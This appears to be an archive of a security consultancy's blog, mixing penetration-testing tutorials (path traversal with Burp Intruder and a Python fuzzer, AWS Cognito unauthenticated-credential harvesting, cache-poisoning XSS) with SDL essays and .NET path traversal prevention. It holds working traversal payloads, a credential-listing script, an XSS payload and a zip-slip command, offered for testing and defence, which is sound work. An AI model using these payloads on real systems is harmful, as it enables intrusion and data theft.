Tuesday, March 17, 2020

How to Path Traversal with Burp Community Suite


A well-known, never out of fashion and high-impact vulnerability is Path Traversal. This technique, also known as the dot-dot-slash attack (../) or directory traversal, consists in exploiting insufficient validation/sanitization of user input that the application uses to build pathnames for retrieving files or directories located underneath a restricted parent directory.
By manipulating these values through special characters, an attacker can cause the pathname to resolve to a location outside of the restricted directory.

In OWASP terms, a path traversal attack falls under category A5 of the Top 10 (2017): Broken Access Control, so as one of the top 10 issues of 2017 it deserves special attention.

In this blog post we will explore an example of web.config exfiltration via path traversal using Burp Suite Intruder Tool.

Previous posts about path traversal:
How to prevent Path Traversal in .NET
From Path Traversal to Source Code in Asp.NET MVC Applications

Testing Step-by-Step

First, get a copy of Burp Suite Community Edition, a useful testing tool that provides many automated and semi-automated features to improve security testing performance.
In particular, the Burp Intruder feature can be very useful for exploiting path traversal vulnerabilities.

Suppose there's a .NET web application vulnerable to path traversal. In order to exploit the issue, the attacker can try to download the whole source code of the application by following this tutorial.

Once the attacker finds a server endpoint that might be vulnerable to Path Traversal, it can be sent to Burp Intruder as shown in the following screenshot.

On the Intruder tab, the target has been set with the request that will be manipulated in order to find the web.config file.

Make sure that the payload is injected in the right attribute position; if not, perform a "Clear §" action, then select the attribute to fuzz and click the "Add §" button.

To set the payloads that Burp Intruder will use to perform the requests, download the file traversals-8-deep-exotic-encoding.txt from the fuzzdb project and provide it to Burp Intruder by executing the following actions:
  • go to the "Payloads" sub-tab;
  • select from dropdown list "Payload type" the value "Simple List";
  • in the panel "Payload Options" click on "Load..." button and select the fuzzing path traversal file (as shown in following screenshot).

The next step is to add a Payload Processing rule to match and replace the placeholder "{FILE}" with the filename we want to exfiltrate (in our example "web.config"), so click on the "Add" button.

In the payload processing rule modal, add the Match string "{FILE}" and the Replace string "web.config", as shown in the following screenshot:

To easily identify a positive response, it is possible to add a Grep-Match value (if known).

Remove all already existing rules:

Then add a new Grep-Match rule for the "<configuration>" string, which indicates that the web.config file has been found.

Finally, it's suggested to tune the Request Engine options based on web server limitations (anti-throttling, firewall systems, etc.) in order to avoid false negatives, for example by increasing the retry delay.

Let's launch the attack. 

If the endpoint is vulnerable to path traversal, the "configuration" column will be checked.
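For readers without Burp, the same run can be scripted. The sketch below is a hypothetical re-implementation of the Intruder setup described above: the endpoint URL is an assumed placeholder, the wordlist is the fuzzdb file, the {FILE} replacement mirrors the payload-processing rule, and the `<configuration>` check mirrors the Grep-Match rule.

```python
# Hypothetical re-implementation of the Intruder run described above.
import urllib.request

TARGET = "http://target.local/download_page?id="    # assumed vulnerable endpoint
WORDLIST = "traversals-8-deep-exotic-encoding.txt"  # fuzzdb wordlist

def build_url(payload, filename="web.config"):
    # Payload-processing rule: replace the {FILE} placeholder.
    return TARGET + payload.replace("{FILE}", filename)

def fuzz():
    with open(WORDLIST) as f:
        payloads = [line.strip() for line in f if line.strip()]
    for payload in payloads:
        try:
            body = urllib.request.urlopen(build_url(payload), timeout=5).read()
        except OSError:
            continue  # network/throttling errors: skip this payload
        if b"<configuration>" in body:  # same check as the Grep-Match rule
            print("HIT:", payload)
```

Calling `fuzz()` against a real target reproduces the Intruder run, minus the throttling options that the Request Engine tab offers.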

Friday, February 14, 2020

A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)

This is the last part of our three-post journey through the main Amazon Web Services and their security.

In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: Part 1 and Part 2.

In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: AWS Cognito and AWS CloudFront.
These are two very different services related to supporting web applications in two specific areas:

  • AWS Cognito aims at providing an access control system that developers can implement in their web applications. 
  • AWS CloudFront is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.

AWS Cognito

AWS Cognito provides developers with an authentication, authorization and user management system that can be implemented in web applications. It is divided into two components:

  • user pools;
  • identity pools. 
Quoting AWS documentation on Cognito:
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.
From a security perspective, we are particularly interested in identity pools as they provide access to other AWS services we might be able to mess with.

Identity pools are identified by an ID that looks like this:

A web application will then query AWS Cognito by specifying the proper Identity pool ID in order to get temporary limited-privileged AWS credentials to access other AWS services.

An identity pool also allows you to specify a role for users that are not authenticated.
Amazon documentation states:
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.

This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.

In fact, let's consider the following scenario of a web application that allows access to AWS S3 buckets upon proper authentication with the identity pool that provides temporary access to the bucket.

Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privileges of accessing AWS S3 buckets.

In such a situation, an attacker will be able to obtain the application's AWS credentials.

The following python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.

In the following script, just replace IDENTITY_POOL with the Identity Pool ID identified during the assessment. 

# NB: This script requires boto3.
# Install it with:
# sudo pip install boto3
import boto3
from botocore.exceptions import ClientError

IDENTITY_POOL = "[IDENTITY_POOL]"  # replace with the Identity Pool ID

try:
    # Get access token
    client = boto3.client('cognito-identity', region_name="us-east-2")
    resp = client.get_id(IdentityPoolId=IDENTITY_POOL)

    print("\nIdentity ID: %s" % resp['IdentityId'])
    print("\nRequest ID: %s" % resp['ResponseMetadata']['RequestId'])

    resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
    secretKey = resp['Credentials']['SecretKey']
    accessKey = resp['Credentials']['AccessKeyId']
    sessionToken = resp['Credentials']['SessionToken']
    print("\nSecretKey: %s" % secretKey)
    print("\nAccessKey ID: %s" % accessKey)
    print("\nSessionToken %s" % sessionToken)

    # Get all bucket names
    s3 = boto3.resource('s3', aws_access_key_id=accessKey,
                        aws_secret_access_key=secretKey,
                        aws_session_token=sessionToken,
                        region_name="eu-west-1")
    print("\nBuckets:")
    for b in s3.buckets.all():
        print(b.name)

except (ClientError, KeyError):
    print("No Unauth")

If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:

Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944

Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793

SecretKey: wJE/[REDACTED]Kru76jp4i


SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF


AWS CloudFront

AWS CloudFront is Amazon's answer to a Content Delivery Network service, whose purpose is to improve the performance of delivering content from web applications.
The following images depict the basics of how CloudFront works.

The browser requests resource X from the edge location.
If the edge location has a cached copy of resource X it simply sends it back to the browser.

The following picture describes what happens if resource X is not cached in the edge location.

  • The browser requests resource X to the edge location which doesn't have a cached version. 
  • The edge location thus requests resource X to its origin, meaning where the original copy of resource X is stored. (This is decided upon configuring CloudFront for a given domain. )
  • The origin location can be, for example, an Amazon service such as an S3 bucket, or a different server not being part of Amazon. 
  • The edge location receives resource X and stores it in its cache for future use and finally sends it back to the browser. 

This simple caching mechanism can be very helpful when it comes to improving the performance of querying a web application, but it might also hide some unwanted behavior.

As recently shown by James Kettle, web applications relying on caching for dynamic pages should be aware of the possibility of abusing such caching functionality to deliver malicious content to users, a.k.a. cache poisoning.
Briefly, as described by Kettle in his post, web cache systems need a way to uniquely identify a request in order to avoid contacting the origin location every time.
To do so, a few parts of an HTTP request are used to fully identify it; these are called cache keys. Whenever a cache key changes, the caching system considers it a different request and, if it doesn't have a cached copy of it, contacts the origin location.
The basic idea behind web application cache poisoning is to find an HTTP parameter that is not a cache key and that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to cache a request containing a malicious payload for that parameter; whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.
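The probing workflow just described can be sketched as a short script, a manual and much simplified version of what param-miner automates (the helper names, the example header, and the `cb` cache-buster parameter are assumptions): request a page with a unique cache buster and a canary value in the candidate header, then replay the same URL without the header and see whether the canary comes back from cache.

```python
# Manual unkeyed-header probe (simplified param-miner idea).
import secrets
import urllib.request

def cache_buster_url(base_url, token):
    # A unique cb= parameter guarantees we start from a fresh cache entry.
    sep = "&" if "?" in base_url else "?"
    return f"{base_url}{sep}cb={token}"

def probe_header(base_url, header="X-Forwarded-Host"):
    token = secrets.token_hex(8)
    canary = f"canary-{token}"
    url = cache_buster_url(base_url, token)
    # 1) poisoning attempt: send the canary in the candidate header
    req = urllib.request.Request(url, headers={header: canary})
    urllib.request.urlopen(req, timeout=5).read()
    # 2) replay the exact same URL without the header
    body = urllib.request.urlopen(url, timeout=5).read().decode(errors="replace")
    return canary in body  # True -> header is unkeyed and the response was cached
```

If `probe_header` returns True, the header is reflected, not part of the cache key, and its value was served back from cache to a request that never sent it.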

Let's consider the following simple request taken from James' post:

GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />

The value of X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By replacing canary with a."><script>alert(1)</script> it's possible to mess with the HTML and generate an alert box.

GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>/cms/social.png" />

However, in this case, X-Forwarded-Host is not used as a cache key. This means that it is possible to store the request containing the alert code in the web cache so that it will be served to other users in the future. As it becomes clear from James' post, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute to the set of cache keys and are valuable candidates for cache poisoning attacks. James has also developed a Burp plug-in called param-miner that can be used to identify HTTP parameters that are not used as cache keys.


This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.
It is undeniable that AWS provides a comprehensive solution that companies take advantage of instead of having to take care of the entire infrastructure by themselves. However, companies are the ones in charge of managing the configurations of the services they decide to use. It thus becomes crucial to test and verify such configurations.

Thursday, April 11, 2019

Secure Development Lifecycle: the SDL value evolution. Part 1

Observability and metrics paradox
It is also about observability: "If a tree falls in a forest and no one is around to hear it, does it make a sound?" ...or: what is the return value (in dollars) of having a better SDL in place if your company wasn't shaken by cybersecurity incidents? I see a little paradox here: after spending a big budget on security you cannot measure the returns; even more, the returns are less visible. You don't have incidents in the first place... and if they happen, then "someone saves you". You may have prevented 9 out of 10 incidents, but it is difficult to make a counterfactual argument at that point.
Oh yes, if you had big problems in the past you can then see the statistical improvements over time, as Microsoft did.

From: https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf
Microsoft case teaches
Microsoft had a comfortable market position and still had to deal with security in the early 2000s. Not every company has a de facto monopoly in the market: your company has competitors and alternatives, and needs its reputation... and let's not dig too deep into cyber-fine scenarios.
MS in the early 2000s put great effort into defining and applying SDL, and still today MS SDL is the reference implementation. That was the genesis of SDL as we know it today; practices like STRIDE Threat Modeling are de facto standards in the industry.
Fortunately, the metrics paradox is being weakened by the fact that SDL is becoming a value in itself: something that can be shown, that completes quality, that enhances reputation and marketing, and that is substance more than form (not only compliance). We'll see how security principles are taking over formal compliance checklists.
Dear <big tech firm here>, can I evaluate your Secure Development Lifecycle?
Supply chain customers are starting to demand a secure process itself, not only secure products and certifications (assuming that is even plausible). An example is the case of the UK Government's relationship with Huawei, but I'm confident others will follow. The next extract is from the Huawei Cyber Security Evaluation Centre Oversight Board: Annual Report 2019.
“3.35 …analysed the adherence of the product to part of Huawei’s own secure coding guidelines, namely safe memory handling functions. … analysed for the use … of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants.”
Not many companies with some complexity and history could quietly survive a similar analysis.
Principles-based practices and the cyber-environmental safety requirement
The security demand cannot be met only by compliance requirements. Compliance, in its various forms (PCI, ISO standards), is still a necessary "sine qua non" condition, but customers and counterparties demand more substance behind it. We can observe this "substance winning over form", for example, in GDPR as a principles-based regulation, as well as in the demand for security process results from key vendors (see the Huawei report from the UK government's cybersecurity agency).
From Wikipedia, GDPR: "Controllers of personal data must put in place appropriate technical and organisational measures to implement the data protection principles"
With that clear in mind, it doesn't take long to forecast that an enterprise investing in security principles and a substantial SDL will have a double advantage: the primordial one, a more secure product (e.g. MS in 2002), but also the newer one coming from visibility, which customers now demand more and more.
SDL was a means to a more secure product; today, even more, it is becoming a company "value" and something in the realm of morality and ethics, not so different from environmental sustainability. Also, the earlier a company sits in the supply chain (hardware, operating systems, authentication servers, payment gateways, dev frameworks), the more it should care, because the bigger is the damage it can do to the information technology environment. Recent years' Spectre, Heartbleed, EternalBlue, BIOS and software-update security incidents are just a few examples of polluting the supply chain.
Metrics transformation; lead vs lag indicators
Take this example of metrics
“the percentage of people wearing hard hats on a building site is a leading safety indicator. A lagging indicator is an output measurement, for example; the number of accidents on a building site is a lagging safety indicator.”
From: https://www.intrafocus.com/lead-and-lag-indicators/
As security development practices evolve, the same should happen to the related metrics. Formal compliance frameworks and the absence of severe incidents may have been enough in the past, but neither is measured before software development itself. Leading indicators, on the other hand, are measured during the SDL; leading efforts could be measured both in resource expenditure and by assessing maturity level, ideally both.
After all, would you trust a nuclear power plant just because it is law-compliant and had no incidents in the last 10 years, even if it doesn't spend a buck on security? Let's put it this way: our planes and power plants run a lot of software, as will our future medical machines and our human-driven and self-driving cars, and I want to see organizations passionately investing in security, in the smartest and most efficient way, please!
In the next part(s) I want to dig deeper into the evolution of SDL practices in the cyber security market.

Secure Development Lifecycle: the SDL value evolution. Part 2

Evolution of SDL practices: from custom to product to service
The increasing visibility trend discussed in Part 1 is, of course, impacting current cybersecurity practices in terms of maturity and evolution, also toward a "service".
Organisations consist of value chains that are comprised of components that are evolving from genesis to more of a commodity. It sounds fairly basic stuff but it has profound effects because that journey of evolution involves changing characteristics.
Following is a Wardley Map (product evolution/visibility graph) comparing Penetration Testing (PT, more a reacting activity) and SDL (preventing vulnerabilities):

The previous example is a comparison over time (say, 10 years) of two of the most common practices in cybersecurity. Penetration Testing (PT) went from a custom-made exercise, to a product, and is now shifting to a commodity (as-a-service PT, crowdsourced bug bounties, etc.), while the 'Prevent' activity, SDL, is gaining the shape of a product and finally more visibility which, by the way, means money.
Pushing security left in the lifecycle, but also pushing up in visibility

from: https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95

The Pushing Left, Like a Boss series explains it very well: how to prevent better. But the map of the evolution of the SDL also shows the point discussed in Part 1 of this article: the visibility value of having an SDL.
The birth of a new language is the result (for some, the cause) of this "pushing left". DevSecOps is the term of the moment to express this fact; "Threat Model" is another term gaining traction.
DevSecOps implies that the "security guys" will be working together with the developers, and also that developers will be more involved in security practices. I think this is a real advancement in the SDL field. Of course, vendors will overload this term with fancy product associations; that is always expected... we know that Dev*Ops is a principle/value more than a bunch of products.
On the contrary, PenTest (black-box testing, often disconnected from the SDL, non-automated, a single point-in-time activity) will have a hard time in the near future in an educated SDL environment. Will rules-based compliance follow this trend soon? I don't know the answer. But if you think you need a PenTest... most likely you need even more to mature your SDL!
Security says yes!
DevSecOps values push toward software evolution (CD: continuous delivery of new features), automation and quality (continuous integration). It is fertile ground for increasing the maturity of the SDL. Investing in SDL also means more functional products in the short/medium term, not only more secure and less risky ones. Of course, the challenge is to transform a legacy product/team to this more integrated approach. Intrinsic problems like the lack of specific expertise in the market are still plaguing the cybersecurity and SDL sector. It is also something that cannot be implemented in a "few weeks". Defining a custom plan, also called a programme or roadmap, based on maturity models like OWASP SAMM and OWASP 5D, made up of incremental enhancements over time, has been successful in several organizations. It may take years, but there are not many shortcuts.

Tuesday, October 23, 2018

How to prevent Path Traversal in .NET


A well-known, never out of fashion and high-impact vulnerability is Path Traversal. This technique, also known as the dot-dot-slash attack (../) or directory traversal, consists in exploiting insufficient validation/sanitization of user input that the application uses to build pathnames for retrieving files or directories from the file system, by manipulating these values through special characters that allow access to parent directories.
In Open Web Application Security Project (OWASP) terms, a path traversal attack falls under category A5 of the Top 10 (2017): Broken Access Control, so as one of the top 10 issues of 2017 it deserves special attention.

Theoretical Concept

Most basic Path Traversal attacks can be performed through the use of the "../" character sequence to alter the resource location requested via a URL. Although many web servers protect applications against escaping from the web root, different encodings of the "../" sequence can be used to bypass these security filters and exploit flawed canonicalization and normalization operations.

URL Encode :
  • %2e%2e%2f which translates to ../
  • %2e%2e/ which translates to ../
  • ..%2f which translates to ../
  • %2e%2e%5c which translates to ..\
  • ..%255c which translates to ..\
  • ..%u2216 which translates to ..\
Valid Unicode / UTF-8 Encodings :
  • %cc%b7 translates to  ̷  (NON-SPACING SHORT SLASH OVERLAY)
  • %cc%b8 translates to  ̸  (NON-SPACING LONG SLASH OVERLAY)
  • %e2%81%84 translates to  ⁄  (FRACTION SLASH)
  • %e2%88%95 translates to  ∕  (DIVISION SLASH)
  • %ef%bc%8f translates to  ／  (FULLWIDTH SLASH)
Invalid Unicode / UTF-8 Encodings :
  • %c1%1c translates to \
  • %c0%af translates to /
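The URL-encoded variants above can be verified quickly with Python's `urllib.parse.unquote`, which performs a single decoding pass; this also shows why a double-encoded payload such as ..%255c survives one round of server-side decoding:

```python
# Single-pass URL decoding of the traversal sequences listed above.
from urllib.parse import unquote

print(unquote("%2e%2e%2f"))  # -> ../
print(unquote("..%2f"))      # -> ../
print(unquote("%2e%2e%5c"))  # -> ..\
# Double encoding: one pass only peels the outer layer (%25 -> %),
# leaving "..%5c" for a later, second decode to turn into "..\"
print(unquote("..%255c"))    # -> ..%5c
```

A filter that decodes once and then checks for "../" misses both the double-encoded and the overlong/Unicode variants, which is exactly what these payload lists probe for.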

Practical Attack

Let's look at two attack examples: the first one exploits incorrect validation and sanitization of input data, which is manipulated to access unexpected resources; the second one exploits a well-known vulnerability of some unzip libraries that don't use secure-by-default logic, allowing files to be unzipped into parent directories via traversal sequences in archive entry names.

Path Traversal
As we saw in a previous post, From Path Traversal to Source Code in Asp.NET MVC Applications, a Path Traversal can lead to catastrophic consequences, and that is why we consider this vulnerability as having a Medium/High impact.
A request like this:

GET /download_page?id=content.dat HTTP/1.1
Host: example-mvc-application.minded

Can be tampered with and exploited using the ../ path sequence to gain access to a configuration file.

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

HTTP/1.1 200 OK
<?xml version="1.0" encoding="utf-8"?>
  <configSections>
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=, Culture=neutral" requirePermission="false" />

Traversal in Unzip Function
Another exploit through path normalization abuse is the unzip directory traversal, which works by embedding traversal sequences in archive entry names in order to extract files into parent directories. There are several tools to create malicious zip files, for example Evilarc.
An example of usage can be seen below:
$ python evilarc.py minded.aspx --path inetpub/wwwroot/ --os unix --depth 9 --output-file minded.zip
Creating minded.zip containing ../../../../../../../../../inetpub/wwwroot/minded.aspx
And here is the structure of the resulting zip file:
$ unzip -l minded.zip 
Archive:  minded.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1254  2018-10-15 15:31   ../../../../../../../../../inetpub/wwwroot/minded.aspx
---------                     -------
     1254                     1 file 
Many common zip programs (WinZip, etc.) will prevent extraction of zip files whose embedded files contain paths with directory traversal characters. However, many software development libraries do not include the same protection mechanisms. This year a good list of impacted libraries was compiled by the Zip Slip disclosure project, which collects the projects affected by this security weakness.
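The library-side fix follows directly from the attack: resolve each entry name against the destination directory before extraction and reject anything that escapes it. A minimal sketch in Python (the same idea applies to any language's zip API; `safe_extract` is an illustrative helper, not a library function):

```python
# Zip-slip-safe extraction sketch: canonicalize each member's target
# path and refuse entries that would land outside the destination.
import os
import zipfile

def safe_extract(zip_path, dest_dir):
    dest = os.path.realpath(dest_dir)
    with zipfile.ZipFile(zip_path) as zf:
        for member in zf.namelist():
            target = os.path.realpath(os.path.join(dest, member))
            if os.path.commonpath([dest, target]) != dest:
                raise ValueError("blocked traversal entry: %s" % member)
        zf.extractall(dest)
```

An archive containing an entry such as ../../pwned.txt is rejected before anything is written to disk, while normal archives extract as usual.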

Vulnerable code

Here we will see some vulnerable code examples, which use different approaches in an attempt to fix path traversal, but without succeeding.

Incorrect Path Validation

When we talk about validation we refer to the verification of submitted data, to make sure it conforms to a rule or set of rules. These could be a simple not-empty check, a complex regular expression, or even whitelist or blacklist checks.
Talking about paths, whitelist and blacklist checks aren't always possible because sometimes the expected items aren't known before runtime, so using a regular expression may be a good idea. But this must be done carefully: defining a suitable regular expression can be practically difficult, and a flawed one can introduce a security weakness.

See the vulnerable example below:
   Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)");
   Match match = regex.Match(location);
   if (match.Success){ ... }
If we try to access another file that does not have the .dat extension, the application will prevent malicious access to the resource, like this:

User input          :   /../web.config
Server validation   :   ../web.config  ->  Fail match regexp!
Built Path          :   \Content\defaultContent.dat

But since the regular expression does not verify that the extension is at the end of the matched string, this check can be bypassed by providing a fake path segment that will be discarded during resource retrieval, because the server performs URI normalization that can be abused, like this:

User input          :   index.aspx?Page=fake.dat/../../web.config
Server validation   :   fake.dat/../../web.config  ->  Success match regexp!
Built Path          :   \Content\fake.dat/../../web.config

When the server accesses the resource, the normalized path will be \web.config.
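The bypass can be reproduced outside .NET. This is a minimal Python sketch: the regex and the \Content base directory mirror the example above, and `posixpath.normpath` plays the role of the server-side URI normalization (`build_path` is a hypothetical helper for illustration):

```python
# Re-creation of the flawed check: the regex has no end anchor, so any
# input containing "<char>.dat" passes, and normalization then walks
# out of the Content directory.
import posixpath
import re

PATTERN = re.compile(r"([a-zA-Z0-9\s_\\.\-:])+(.dat)")

def build_path(user_input):
    if not PATTERN.search(user_input):
        return None  # rejected by the "validation"
    return posixpath.normpath(posixpath.join("/Content", user_input))

print(build_path("../web.config"))             # None: no ".dat", rejected
print(build_path("content.dat"))               # /Content/content.dat
print(build_path("fake.dat/../../web.config")) # bypass -> /web.config
```

The fake.dat segment only exists to satisfy the regex; normalization removes it together with the Content prefix.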

Incorrect Path Sanitization

When we talk about sanitization we refer to the manipulation of user input before it is used in the application business logic: removing, escaping or replacing parts of the user input in order to avoid wrong application behavior. Talking about paths, a good example of weak sanitization is the removal of the "../" character sequence.
See the vulnerable example below:

   location = location.Replace(@"..\", ""); //win
This removes the occurrences of "..\" from user input, so when a path traversal is provided, it is transformed and sanitized like this:

User input          :   index.aspx?Page=..\web.config
Server Sanitization :   ..\web.config  ->  web.config
Built Path          :   \Content\web.config 

But if we just change the back-slash ( \ ) to a slash ( / ), it can be exploited again, because servers usually perform URL normalization:

User input          :   index.aspx?Page=../web.config
Server Sanitization :   ../web.config  ->  ../web.config
Built Path          :   \Content\../web.config 

One might be tempted to remove them both, but this isn't a solution because we can again exploit it through a nested dot-dot-slash payload, like this:

User input          :   index.aspx?Page=...\.\web.config
Server Sanitization :   ...\.\web.config  ->  ..\web.config
Built Path          :   \Content\..\web.config 

While the nested "..\" is removed, the sanitized string still contains a "..\" sequence that is never re-checked, which brings back the Path Traversal. When the server accesses the resource, the normalized path will be \web.config.
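The same single-pass weakness is easy to demonstrate in Python, where `str.replace` also scans the input once and never re-examines the text it has already produced (`sanitize` is a hypothetical helper mirroring the .NET Replace calls):

```python
# Single-pass removal of traversal sequences, as in the .NET example:
# the nested payload reassembles into "..\" after sanitization.
def sanitize(path):
    return path.replace("..\\", "").replace("../", "")

print(sanitize("..\\web.config"))      # simple payload neutralized: web.config
print(sanitize("...\\.\\web.config"))  # nested payload survives:   ..\web.config
```

Removing the matched "..\" from "...\.\web.config" glues the leftover dots and backslash back together into a fresh "..\", which is why remove-and-forget sanitization needs to loop until a fixed point, or be replaced by canonicalization.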

Vulnerable Unzip library

When using an unzip library, you need to be careful because there may be security weaknesses caused by vulnerable code; this can be a known or unknown problem in the library.
For example, if we have a look at the source of the SharpZipLib library, in a version that was vulnerable to traversal during unzip, we can see where the problem was:
public string TransformFile(string name)
{
 if (name != null) {
  name = MakeValidName(name, _replacementChar);
  if (_trimIncomingPaths) {
   name = Path.GetFileName(name);
  }
  // This may exceed windows length restrictions.
  // Combine will throw a PathTooLongException in that case.
  if (_baseDirectory != null) {
   name = Path.Combine(_baseDirectory, name);
  }
 } else {
  name = string.Empty;
 }
 return name;
}
As can be seen, the base path is simply concatenated with the name of the file from the compressed archive. The ability to use upper-directory character sequences in the name of a compressed file is allowed by the zip specification, but since not all developers know this, it usually leads to path traversal issues. That's why security-by-default should be used in library methods, disallowing traversal paths during unzipping by default.

How to fix

Obviously the most effective approach is to map resource locations using indirect object references, preventing source (user input) and sink (reading/writing/deleting files or directories) from ever meeting and allowing exploits. However, this is not always a suitable solution: it may cost development resources, it may not be supported by the application architecture, or it may simply not be necessary. In other cases we can combine path validation, path sanitization and an absolute path check.

The absolute path check means that we verify, from the root, whether the file we are about to access is the one we were expecting. In other words, we segregate resources through path canonicalization, making the path absolute before using it in the application business logic. Canonicalization is a process of lossless reduction of the input to its simplest known equivalent form. In C# there is a method called "System.IO.Path.GetFullPath" which returns the canonicalized path, and we just check whether it starts with an authorized location.
protected string readFile(string location)
{
   Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)$");
   Match match = regex.Match(location);
   if (match.Success)
   {
      if (File.Exists(location) && Path.GetFullPath(location).StartsWith(@"C:\Applications\Documents", StringComparison.OrdinalIgnoreCase))
      {
         using (StreamReader reader = new StreamReader(location))
            return reader.ReadToEnd();
      }
      return "File not found";
   }
   return "File name not valid";
}
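For comparison, the same canonicalize-then-check defense can be sketched in Python, where `os.path.realpath` plays the role of Path.GetFullPath (the authorized base directory and the `is_allowed` helper are assumptions for illustration):

```python
# Canonicalize-then-check: resolve the requested path and allow it only
# if it still lives under the authorized base directory.
import os

BASE = os.path.realpath("/Applications/Documents")  # authorized location (assumption)

def is_allowed(location):
    full = os.path.realpath(os.path.join(BASE, location))
    return os.path.commonpath([BASE, full]) == BASE

print(is_allowed("content.dat"))       # True
print(is_allowed("../../web.config"))  # False: escapes the base directory
```

Note the prefix check is done on the canonicalized path with `commonpath`, not with a bare string startswith, which would wrongly accept a sibling directory such as /Applications/DocumentsEvil.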

Traversal Unzip

Before using an unzip library, make sure it has not been found vulnerable to unzip directory traversal, for example by checking the Zip Slip disclosure project or the CVE database, or by testing it as we have shown.


Let's try to summarize the approaches:

  • Validation: reject input which does not respect the defined rules. If missing or bypassed, it may lead to other security issues (XSS, SQL Injection, even log injection).
  • Sanitization: remove unwanted characters before the input is used by the application. If not whitelist-based, it may leave some unexpected characters.
  • Absolute Path Check: using canonicalization, verify the correct file segregation. If the user input is not validated and sanitized, it may lead to other security issues.
Since security is not a static situation, nor a destination to be reached, but rather a continuous process, approaching the fix for a path traversal with only a single method can be simplistic and often not resolutive. The best way is to adopt a security-oriented mentality that involves the different layers of the development process (you can check how strong this orientation is in your company with the new Minded Security Software Security 5D framework); but, speaking from a technical point of view, validation, sanitization and canonicalization are three methods that should be used in a complementary way to minimize security risks.

  • https://www.owasp.org/index.php/Path_Traversal
  • http://cwe.mitre.org/data/definitions/22.html
  • https://www.owasp.org/index.php/File_System#Path_traversal
  • https://unicode-search.net/unicode-namesearch.pl?term=SLASH

Author: Enrico Aleandri